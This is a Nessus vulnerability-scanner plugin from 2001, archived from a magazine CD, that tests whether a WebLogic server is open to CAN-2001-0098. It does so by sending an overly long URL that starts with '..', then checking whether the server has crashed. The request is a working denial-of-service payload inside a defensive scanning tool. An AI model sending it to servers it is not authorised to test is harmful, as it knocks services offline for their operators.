home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / weblogic_dotdotdos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  68 lines

  1. #
  2. # This script was written by Vincent Renardias <vincent@strongholdnet.com>
  3. #
  4. # Licence : GPL v2
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10697);
  10.  script_bugtraq_id(2138);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CAN-2001-0098");
  13.  name["english"] = "WebLogic Server DoS";
  14.  name["francais"] = "WebLogic Server DoS";
  15.  
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. Requesting an overly long URL starting with a double dot
  20. can crash certain version of WebLogic servers.
  21.  
  22. Risk factor : High
  23. Solution : upgrade to at least WebLogic 5.1 with Service Pack 7";
  24.  
  25.  script_description(english:desc["english"]);
  26.  
  27.  summary["english"] = "WebLogic Server DoS";
  28.  summary["francais"] = "WebLogic Server DoS";
  29.  script_summary(english:summary["english"], francais:summary["francais"]);
  30.  
  31.  script_category(ACT_DENIAL);
  32.  
  33.  
  34.  script_copyright(english:"This script is Copyright (C) 2001 StrongHoldNet",
  35.         francais:"Ce script est Copyright (C) 2001 StrongHoldNet");
  36.  family["english"] = "Remote file access";
  37.  family["francais"] = "AccΦs aux fichiers distants";
  38.  script_family(english:family["english"], francais:family["francais"]);
  39.  script_dependencie("find_service.nes");
  40.  script_require_ports("Services/www", 80);
  41.  exit(0);
  42. }
  43.  
  44. #
  45. # The script code starts here
  46. #
  47.  
  48. include("http_func.inc");
  49.  
  50. port = get_http_port(default:80);
  51.  
  52.  
  53. if(get_port_state(port))
  54. {
  55.  if(http_is_dead(port:port))exit(0);
  56.  soc = http_open_socket(port);
  57.  if(soc)
  58.  {
  59.   buffer = http_get(item:string("..", crap(10000)), port:port);
  60.   send(socket:soc, data:buffer);
  61.   r = http_recv(socket:soc);
  62.   http_close_socket(soc);
  63.   
  64.   if(http_is_dead(port:port))security_hole(port);
  65.  }
  66. }
  67.  
  68.